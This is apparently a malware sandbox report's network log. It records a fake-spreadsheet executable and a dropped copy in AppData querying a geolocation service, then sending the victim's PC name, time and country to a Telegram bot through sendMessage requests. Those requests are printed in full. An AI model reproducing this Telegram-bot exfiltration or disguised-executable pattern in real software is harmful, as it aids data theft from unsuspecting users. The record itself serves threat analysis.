                                                                      2024-10-07 12:52:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                      2024-10-07 12:52:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      10192.168.2.749800188.114.96.34436504C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 12:52:30 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      2024-10-07 12:52:30 UTC678INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:30 GMT
                                                                      Content-Type: application/xml
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      vary: Accept-Encoding
                                                                      Cache-Control: max-age=86400
                                                                      CF-Cache-Status: HIT
                                                                      Age: 61885
                                                                      Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6wMxE59ru6eF9Mvuku%2F5e8DqP%2FHhLOXeAo5WKP3ltMPJc7iTHQzNwhpZQEvSSSwJqbfapIfNMz%2FP2qzpBAwp45anYqDvBoDcCX%2BdWdxNE47BA1777GCBqahNb2IiDHnepR0467cO"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8cee07593db95590-EWR
                                                                      2024-10-07 12:52:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                      2024-10-07 12:52:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.749812188.114.96.34437944C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 12:52:31 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      2024-10-07 12:52:31 UTC684INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:31 GMT
                                                                      Content-Type: application/xml
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      vary: Accept-Encoding
                                                                      Cache-Control: max-age=86400
                                                                      CF-Cache-Status: HIT
                                                                      Age: 61886
                                                                      Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TSn8Gzl%2FeZexXOxC4k5ZlQayorXmo%2FFSCVvBVbMf2eM6vb4fUemun3WML7ey1svdpWHPny1mbVdgiOfmhyeTt%2Be%2BsPtqC%2FW1XKzjTA0CGyZx%2BpMZ5agE8AzaxRYK%2FYYcvE72ugW3"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8cee0760b883c34f-EWR
                                                                      2024-10-07 12:52:31 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                      2024-10-07 12:52:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.749813188.114.96.34436504C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 12:52:31 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                      2024-10-07 12:52:31 UTC680INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:31 GMT
                                                                      Content-Type: application/xml
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      vary: Accept-Encoding
                                                                      Cache-Control: max-age=86400
                                                                      CF-Cache-Status: HIT
                                                                      Age: 61886
                                                                      Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QSIiktgBvo1u9I%2B1boaWGmOwmA20%2FIvbyQXakWs2Nb6tvr0lv9GKF0oNJWezKcKzGM748tiqq4rK5kAJBNcHBLmEJM3O%2FWE%2FkrOFbkEcqSGFwVpcgtlaIVH%2FpT8px8AvQN9DWEHm"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8cee07616cfb4358-EWR
                                                                      2024-10-07 12:52:31 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                      2024-10-07 12:52:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.749823188.114.96.34437944C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 12:52:32 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                      2024-10-07 12:52:32 UTC710INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:32 GMT
                                                                      Content-Type: application/xml
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      vary: Accept-Encoding
                                                                      Cache-Control: max-age=86400
                                                                      CF-Cache-Status: HIT
                                                                      Age: 61887
                                                                      Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ATmXH3qmWEVZhxdFOmAKshN5fkREMj8R%2FoX4u4nQQ2w33Ut1ILJTtrZFcpO%2FOUDLzHq%2Bj3%2FTmJdEbKlRsbnolKRwZRNSsziYC8Y1WuQbJJB%2BCsrkbP2KBVHKweKcv2YpxUcHj541"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8cee07687dc6422d-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-10-07 12:52:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                      2024-10-07 12:52:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.749826188.114.96.34436504C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 12:52:32 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                      2024-10-07 12:52:33 UTC682INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:32 GMT
                                                                      Content-Type: application/xml
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      vary: Accept-Encoding
                                                                      Cache-Control: max-age=86400
                                                                      CF-Cache-Status: HIT
                                                                      Age: 61887
                                                                      Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QyNuEprn%2FT68hs1QPs5QzL8PML901yVJ6m7ZounDXjQzrUcC9h%2BZPD%2FUbAICkel%2F%2BW66FQ8XB5EFprOB7XT1n9KXnpp6KXKghc%2Bd89HOgzfKGq5sZEiqfWS30uZZOkWTBG5RMQcD"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8cee0769be77c32f-EWR
                                                                      2024-10-07 12:52:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                      2024-10-07 12:52:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      15192.168.2.749828149.154.167.2204437944C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 12:52:33 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2020:57:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                      Host: api.telegram.org
                                                                      Connection: Keep-Alive
                                                                      2024-10-07 12:52:33 UTC344INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.18.0
                                                                      Date: Mon, 07 Oct 2024 12:52:33 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 55
                                                                      Connection: close
                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                      2024-10-07 12:52:33 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      16192.168.2.749839188.114.96.34436504C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 12:52:34 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                      2024-10-07 12:52:34 UTC674INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:34 GMT
                                                                      Content-Type: application/xml
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      vary: Accept-Encoding
                                                                      Cache-Control: max-age=86400
                                                                      CF-Cache-Status: HIT
                                                                      Age: 61889
                                                                      Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=99k9Oia71J0%2FGRylYMQiPdhF3Npe47KJNBFlb1YNI0bWrNX50CsUE4C3fXcLf8SbUeE%2Fb3Qh4vVIPj51H4t5SxzpVRG8ozRr2O45A03Fw47T2X5V1PWc7VbStrip5iJ8jQ6S40oG"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8cee0774deb143bb-EWR
                                                                      2024-10-07 12:52:34 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                      2024-10-07 12:52:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      17192.168.2.749850188.114.96.34436504C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 12:52:35 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                      2024-10-07 12:52:36 UTC676INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:35 GMT
                                                                      Content-Type: application/xml
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      vary: Accept-Encoding
                                                                      Cache-Control: max-age=86400
                                                                      CF-Cache-Status: HIT
                                                                      Age: 61890
                                                                      Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fePwghk6RuqCFgpoCOkZUNKS%2FHaDZDl6IWrlDtUgraQV3Pau1dasfrM5heHKrZh20QHTCEeB%2BWtBtBuyoTzfAlrolEO7h8q5RZDXAVo0EirmpEuqRcZfB28%2B8yqOTmA0xZQXc1Hl"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8cee077cde553300-EWR
                                                                      2024-10-07 12:52:36 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                      2024-10-07 12:52:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      18192.168.2.749868188.114.96.34436504C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 12:52:37 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                      2024-10-07 12:52:37 UTC676INHTTP/1.1 200 OK
                                                                      Date: Mon, 07 Oct 2024 12:52:37 GMT
                                                                      Content-Type: application/xml
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      access-control-allow-origin: *
                                                                      vary: Accept-Encoding
                                                                      Cache-Control: max-age=86400
                                                                      CF-Cache-Status: HIT
                                                                      Age: 61892
                                                                      Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PEdV4cWFxeXmKfxqwcfCMOfofAwIMcwkAXUhURzUS9uX5XWvWqH3CIce2z1ooANN13Y72mXY8sG%2FYpyf4iByVmrN9OyJ9T%2F%2FDBdkiskW7rHozUbMV6tjcmvQU444z9SqXcdmpLlf"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8cee07884aa80f73-EWR
                                                                      2024-10-07 12:52:37 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                      2024-10-07 12:52:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      19192.168.2.749871149.154.167.2204436504C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 12:52:38 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2021:07:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                      Host: api.telegram.org
                                                                      Connection: Keep-Alive
                                                                      2024-10-07 12:52:38 UTC344INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.18.0
                                                                      Date: Mon, 07 Oct 2024 12:52:38 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 55
                                                                      Connection: close
                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                      2024-10-07 12:52:38 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:08:52:17
                                                                      Start date:07/10/2024
                                                                      Path:C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                                      Wow64 process (32bit):true
